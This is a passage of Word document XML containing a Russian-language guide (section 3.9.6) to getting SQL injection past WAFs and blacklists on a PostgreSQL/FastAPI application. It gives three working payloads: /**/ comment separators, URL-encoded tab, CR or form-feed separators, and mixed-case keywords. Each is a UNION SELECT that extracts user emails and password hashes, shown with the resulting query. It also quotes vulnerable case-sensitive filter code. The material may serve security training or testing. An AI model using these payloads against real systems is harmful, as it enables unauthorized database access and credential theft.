        <w:t xml:space="preserve">if "DROP" in q.upper()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — правильно, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if "DROP" in q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — уязвимо) — помогает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Принципиальное ограничение 3.9.6 в отличие от 3.9.1–3.9.5: эти приёмы работают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только если точка инъекции вне строкового литерала</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или payload содержит синтаксис, который должен парситься PG как SQL. Если фильтр блокирует сами имена/значения внутри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-литерала — нужно 3.9.2/3.9.3/3.9.4/3.9.5. 3.9.6 — про то, как протолкнуть payload, в котором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уже есть текстом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — `/**/` как разделитель токенов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст — WAF 3.9.0 блокирует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OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Заменяем все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между ключевыми словами на пустой комментарий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x'/**/UNION/**/SELECT/**/id,/**/email,/**/password_hash/**/FROM/**/users/**/WHERE/**/1/**/=/**/1--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Однако WAF 3.9.0 содержит правило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(блокирует любые SQL-комментарии).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его тоже триггерит — нужно либо обходить это правило заодно (см. ниже), либо ограничиться tab/CR (Payload B).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В сценарии, где WAF блокирует только UNION-сигнатуру и тавтологию (не комментарии — частый случай у самописных blacklist-ов), payload работает напрямую. </w:t>
      </w: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id, title, body FROM articles WHERE title = 'x'/**/UNION/**/SELECT/**/id,/**/email,/**/password_hash/**/FROM/**/users/**/WHERE/**/1/**/=/**/1--'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG-лексер обрабатывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/* ... */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (включая пустой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block-comment и удаляет его из потока токенов. Парсер видит эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">... UNION SELECT id, email, password_hash FROM users WHERE 1=1 --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. WAF-regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bUNION\s+SELECT\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не срабатывает: между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стоит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а не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Когда WAF блокирует ещё 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в 3.9.0) — нужен Payload B (tab/CR) либо комбинация с 3.9.1 (упаковать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DO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-блок с dollar-quoted dynamic SQL).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — tab / CR / form-feed как разделитель</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL Lexical Structure §4.1.1 явно перечисляет, что считается whitespace на уровне лексера: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">space (0x20), tab (0x09), newline (0x0A), CR (0x0D), form feed (0x0C)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Любой из них корректно разделяет токены.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если WAF использует Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re</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без флага </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.ASCII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, то Python трактует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как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[ \t\n\r\f\v]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — таб и newline покрываются. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes-level фильтры</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на старых ModSecurity (CRS до v3 с операторами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">t:none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) обрабатывают только литеральный байт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0x20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. URL-encoded tab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> после URL-decode превращается в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(0x09); PG его как whitespace принимает, WAF не распознал как разделитель и не сработал на сигнатуре.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (URL-encoded,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x'%09UNION%09SELECT%09id,%09email,%09password_hash%09FROM%09users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После URL-decode на стороне FastAPI:</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(где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обозначен табом). </w:t>
      </w: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id, title, body FROM articles WHERE title = 'x'	UNION	SELECT	id,	email,	password_hash	FROM	users--'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG-лексер табы между токенами трактует как whitespace, парсит обычный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Для CR-варианта — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%0D</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%0A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (newline). Для form-feed — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%0C</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В Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> современный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ловит таб; этот payload работает против старого ModSecurity или против самописного фильтра вроде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if " UNION SELECT " in q.upper()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (где между словами literal space). Для CRS — нужен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(Payload A) или dollar-quote-обёртка (3.9.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — case-mixing для case-sensitive blacklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст — sanitizer в коде приложения, не WAF из 3.9.0. Классические уязвимые формы:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># уязвимо — substring match case-sensitive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if "UNION" in q or "SELECT" in q:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    raise HTTPException(400)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уязвимо — то же</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">forbidden = ["UNION", "DROP", "EXEC"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if any(f in q for f in forbidden):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    raise HTTPException(400)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не уязвимо — uppercase нормализация</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if "UNION" in q.upper():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    raise HTTPException(400)</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 UnIoN SeLeCt id, email, password_hash FrOm users WhErE 1=1--</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id, title, body FROM articles WHERE title = 'x' UnIoN SeLeCt id, email, password_hash FrOm users WhErE 1=1--'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG полностью case-insensitive на keywords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FROM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и на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">unquoted identifiers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (имена таблиц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колонок </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, функций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Конкретно: парсер на этапе токенизации приводит unquoted идентификаторы к lower-case (см. PG Lexical Structure §4.1.1). Поэтому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Quoted identifiers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case-sensitive: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находит таблицу, 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уже нет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что не работает:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> строковые литералы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 это значения, PG их не нормализует. Case-mixing бесполезен для скрытия содержимого литералов; для них нужен 3.9.2/3.9.3/3.9.4/3.9.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Анти-сигнатура.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
